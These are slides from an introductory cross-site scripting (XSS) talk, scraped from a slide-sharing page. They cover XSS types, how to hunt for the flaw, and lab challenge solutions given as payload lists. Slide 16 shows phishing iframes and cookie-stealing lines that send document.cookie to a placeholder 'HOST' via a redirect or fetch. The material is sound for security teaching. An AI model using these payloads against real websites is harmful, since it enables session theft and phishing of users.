Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Xss101

240 views

Published on

Null Meet June 2018:
XSS-101

Published in: Technology
  • Be the first to comment

Xss101

  1. 1. XSS-101 Sahil Khan Email:(sahil@null.co.in) Twitter:@codesahil
  2. 2. Some Basic Terminologies You Should Know...... ● Injection Point : Where vulnerability can exsist ● Vulnerability : Its a Flaw or a weakness of a System ● Payload : It is a script or a code that is used to Identify Vulnerability ● Exploitation : Taking advantage of that vulnerability to gain system access
  3. 3. Background Concept of XSS Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser. The attacker does not directly target his victim. Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him. To the victim's browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.
  4. 4. Working of XSS
  5. 5. Impact of XSS ● Cookie Theft ● Keylogging ● Phishing ● URL Redirection
  6. 6. Types of XSS ● Reflected XSS ● Stored XSS ● Dom-Based XSS
  7. 7. Reflected XSS When the website or application just reflects back content maliciously manipulated by user (usually in the URL), we have a reflected XSS attack. This reflection, as we saw, affects the way browsers display the page and how they process things and behave
  8. 8. Stored XSS When the website or application stores user input in a database or a file to display it later, like a field in a profile or a comment in a forum, the resulting attack is called persistent or stored XSS. Every user that sees this stored content is a potential victim.
  9. 9. How to Hunt for XSS ● Find a Input Parameter , Give any input There . If your input reflect or stored any where there may be XSS ● Try to execute any Javascript code there , if you succeed to execute any javascript there then there is a XSS ● Exploitation of XSS
  10. 10. Steps ● Find some common page such as – Contact Us | Search bar | Comment Box | Forums |Signup | Login Page | etc ● Find Input Parameters ● Give any Input There , if your Input reflect back to you ● Try to Inject any javascript there
  11. 11. Lets do a Lab Practice Manual Building of XSS Vector ● Lab 1 Link - http://leettime.net/xsslab1/ ● Lab 2 Link - http://prompt.ml/ ● Another Lab for Practice - http://testphp.vulnweb.com/
  12. 12. Hints for Lab Practice 1 ● Challenge 7: keyboard input will become a string response you can try to give input through mouse Payload : onmouseover=alert(1);
  13. 13. Solutions to Lab 1 (Payloads List) 1. <script>alert(docuement.URL)</script> 2. ><script>alert(document.URL)</script> 3. "><script>alert(document.URL)</script> 4. '><script>alert(document.URL)</script> 5. </script><script>alert(document.URL)</script> 6. ';</script><script>alert(document.URL)</script> 7. "onmouseover="alert(1);
  14. 14. Some Hints to Lab 2 ● Challenge 1 : whenever your input reflect as a plain text you should use svg vector Payload : <svg/onload=prompt(1); ● whenever they take url as a input filed you can try to inject paylod through a file.
  15. 15. Solutions to Lab 2 (Payloads List) ● Level 0 : "><svg/onload=prompt(1)> ● Level 1 : <svg/onload=prompt(1) ● Level 2 : <svg><script>prompt(1)</script> ● Level 3 : --!><svg/onload=prompt(1) For Further Solutions Refer here : https://github.com/cure53/XSSChallengeWiki/wi ki/prompt.ml
  16. 16. Exploitation of XSS ● URL Redirection : document.location.href=”http://bing.com” (an attacker can use this vulnerability for phishing) ● Phishing : <iframe src=“http://bing.com” height=“100%” width=”100%”> ● Cookie Stealing XSS document.location.href=”//HOST”+document.cookie <svg onload=fetch(‘//HOST/?cookie=’+document.cookie)>
  17. 17. XSS Payloads for Burp Intruder ● URL : https://github.com/swisskyrepo/PayloadsAllTheThin
  18. 18. References ● Brute Logic : https://brutelogic.com.br/blog Twitter - @brutelogic ● https://www.owasp.org/index.php/Cross-site_Scripting ) ● https://www.acunetix.com/websitesecurity/cross-site-s ● RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html
  19. 19. Any Questions?????
  20. 20. Thank You

×